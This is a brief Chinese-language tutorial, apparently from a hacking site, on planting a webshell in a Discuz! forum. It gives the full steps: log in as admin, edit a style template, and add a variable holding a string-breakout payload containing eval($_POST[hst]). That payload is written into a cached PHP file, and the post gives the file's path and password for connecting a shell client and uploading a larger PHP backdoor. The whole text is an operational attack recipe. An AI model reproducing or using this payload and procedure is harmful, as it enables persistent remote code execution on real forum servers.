漏洞介绍:http://www.hackline.net/a/Special/wlgf/2009/1004/883.html

利用方法:
1、使用discuz!论坛的管理用户和密码登陆后台。



2、进入后台,界面--风格管理--找到一个模板进行编辑--



3、切换到高级编辑,在最下面新增一个变量



变量内容为 ', '#999');eval($_POST[hst]);//   替换内容随便写
4、进行提交   这里的密码是"HST"


5、提交之后生成的一句话***连接地址为
/forumdata/cache/style_模板ID.php



注意看图中的id=57。那么一句话的地址文件名就是style_57.php

6、打开一句话连接端,http://localhost:806/forumdata/cache/style_57.php 密码HST大写```
创建一个文件。输入文件名称,内容PHP大马。


7、提交结果:
http://localhost:806/forumdata/cache/1.txt




注意:如果一句话***的密码是英文字母的话,连接的时候改成大写的连接。